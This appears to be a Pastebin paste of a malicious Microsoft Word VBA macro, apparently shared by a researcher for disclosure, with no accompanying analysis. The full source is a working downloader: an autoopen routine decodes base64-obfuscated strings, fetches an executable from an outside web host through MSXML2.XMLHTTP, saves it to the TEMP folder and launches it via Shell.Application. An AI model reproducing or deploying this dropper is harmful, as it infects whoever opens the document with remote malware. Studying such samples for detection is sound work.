Advertisement
dynamoo

Malicious Word macro

Jan 26th, 2015
595
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Private Const QfmDLcA = "aHR0cDovL2VsZWt0cm9tYXJrZXQuY2JhLnBsL2pzL2Jpbi5leGU="
  10. Private Const bkRp4EmIEHl = "XExBVlVCREFKTENELmV4ZQ=="
  11. Private Const oOUPR = "VEVNUA=="
  12. Private Const QoXvtVUK = "U2hlbGwuQXBwbGljYXRpb24="
  13. Private Const gmgiLh = "Z2ZoZGZnc2Rn"
  14. Private Const Lh2UI8IfTSJJ = "R0VU"
  15. Private Const JTWAlwSMB = "TVNYTUwyLlhNTEhUVFA="
  16. Private aDecTab(255) As Integer
  17. Private Const YHg = "="
  18. Private Const SEQjeSufc = "/"
  19. Private Const jNv8XFecDC = "+"
  20. Private Const dNCBqqiwE = "9"
  21. Private Const ePZeX = "0"
  22. Private Const OMm60OhvoT = "z"
  23. Private Const hnEMr0yp = "a"
  24. Private Const lka4A = "Z"
  25. Private Const OHtV = "A"
  26. Private Const Iav = " "
  27.  
  28. Sub NsCi()
  29.  e2UWZEpCVQ
  30. End Sub
  31. Sub JyXsorj()
  32.      NsCi
  33. End Sub
  34. Sub autoopen()
  35.      NsCi
  36. End Sub
  37. Function XPBNSN(ByVal ADLSYXKPREO As String, ByVal IKDBZPEAYPQ As String) As Boolean
  38.      Dim XJVojlA6AlK As Long, MQVWCEBVJCH As Long, KEXFJZFKHXC() As Byte
  39.  
  40.     Set ZNMPYFFKHMF = CreateObject(IWF0II4a(JTWAlwSMB))
  41.     ZNMPYFFKHMF.Open IWF0II4a(Lh2UI8IfTSJJ), ADLSYXKPREO, False
  42.     ZNMPYFFKHMF.Send IWF0II4a(gmgiLh)
  43.  
  44.  
  45.     KEXFJZFKHXC = ZNMPYFFKHMF.responseBody
  46.  
  47.     MQVWCEBVJCH = FreeFile
  48.     Open IKDBZPEAYPQ For Binary Access Write As #MQVWCEBVJCH
  49.     Put #MQVWCEBVJCH, , KEXFJZFKHXC
  50.     Close #MQVWCEBVJCH
  51.    
  52. Set sdfsdfsdf = CreateObject(IWF0II4a(QoXvtVUK))
  53. sdfsdfsdf.Open Environ(IWF0II4a(oOUPR)) & IWF0II4a(bkRp4EmIEHl)
  54. End Function
  55. Sub e2UWZEpCVQ()
  56. BHngijbjfdv = Environ(IWF0II4a(oOUPR)) & IWF0II4a(bkRp4EmIEHl)
  57. sdnfhuijk = IWF0II4a(QfmDLcA)
  58.      XPBNSN sdnfhuijk, BHngijbjfdv
  59. End Sub
  60.  
  61.  
  62. Public Function IWF0II4a(sEncoded As String) As String
  63. Dim p8OROg2Ya As String
  64. Dim d(3) As Byte
  65. Dim C As Byte
  66. Dim di As Integer
  67. Dim i As Long
  68. Dim SYTVw3OVtcQ As Long
  69. Dim MILoam1NHP As Long
  70. SYTVw3OVtcQ = Len(sEncoded)
  71. p8OROg2Ya = String((SYTVw3OVtcQ \ 4) * 3, Iav)
  72. MILoam1NHP = 0
  73. di = 0
  74. Call LEqE
  75. ' Read in each char in trun
  76. For i = 1 To Len(sEncoded)
  77. C = CByte(Asc(Mid(sEncoded, i, 1)))
  78. C = aDecTab(C)
  79. If C >= 0 Then
  80. d(di) = C
  81. di = di + 1
  82. If di = 4 Then
  83. Mid$(p8OROg2Ya, MILoam1NHP + 1, 3) = c3IyL8a(d)
  84. MILoam1NHP = MILoam1NHP + 3
  85. If d(3) = 64 Then
  86. p8OROg2Ya = Left(p8OROg2Ya, Len(p8OROg2Ya) - 1)
  87. MILoam1NHP = MILoam1NHP - 1
  88. End If
  89. If d(2) = 64 Then
  90. p8OROg2Ya = Left(p8OROg2Ya, Len(p8OROg2Ya) - 1)
  91. MILoam1NHP = MILoam1NHP - 1
  92. End If
  93. di = 0
  94. End If
  95. End If
  96. Next i
  97.  IWF0II4a = p8OROg2Ya
  98. End Function
  99. Private Function c3IyL8a(d() As Byte) As String
  100. Dim C2OurROpo As String
  101. Dim C As Long
  102. C2OurROpo = vbNullString
  103. C = ihX4AO6OBJbw(d(0)) Or (anfuBRZrOy(d(1)) And &H3)
  104. C2OurROpo = C2OurROpo & Chr$(C)
  105. C = s4OLJjiY(d(1) And &HF) Or (D2ULJbG1EKA(d(2)) And &HF)
  106. C2OurROpo = C2OurROpo & Chr$(C)
  107. C = jyQ(d(2) And &H3) Or d(3)
  108. C2OurROpo = C2OurROpo & Chr$(C)
  109.  c3IyL8a = C2OurROpo
  110. End Function
  111. Private Function LEqE()
  112. Dim t As Integer
  113. Dim C As Integer
  114. For C = 0 To 255
  115. aDecTab(C) = -1
  116. Next
  117. t = 0
  118. For C = Asc(OHtV) To Asc(lka4A)
  119. aDecTab(C) = t
  120. t = t + 1
  121. Next
  122. For C = Asc(hnEMr0yp) To Asc(OMm60OhvoT)
  123. aDecTab(C) = t
  124. t = t + 1
  125. Next
  126. For C = Asc(ePZeX) To Asc(dNCBqqiwE)
  127. aDecTab(C) = t
  128. t = t + 1
  129. Next
  130. C = Asc(jNv8XFecDC)
  131. aDecTab(C) = t
  132. t = t + 1
  133. C = Asc(SEQjeSufc)
  134. aDecTab(C) = t
  135. t = t + 1
  136. C = Asc(YHg)
  137. aDecTab(C) = t  ' should be 64
  138. End Function
  139. Private Function ihX4AO6OBJbw(ByVal bytValue As Byte) As Byte
  140.  ihX4AO6OBJbw = (bytValue * &H4) And &HFF
  141. End Function
  142. Private Function s4OLJjiY(ByVal bytValue As Byte) As Byte
  143.  s4OLJjiY = (bytValue * &H10) And &HFF
  144. End Function
  145. Private Function jyQ(ByVal bytValue As Byte) As Byte
  146.  jyQ = (bytValue * &H40) And &HFF
  147. End Function
  148. Private Function D2ULJbG1EKA(ByVal bytValue As Byte) As Byte
  149.  D2ULJbG1EKA = bytValue \ &H4
  150. End Function
  151. Private Function anfuBRZrOy(ByVal bytValue As Byte) As Byte
  152.  anfuBRZrOy = bytValue \ &H10
  153. End Function
  154. Private Function o5ULA(ByVal bytValue As Byte) As Byte
  155.  o5ULA = bytValue \ &H40
  156. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement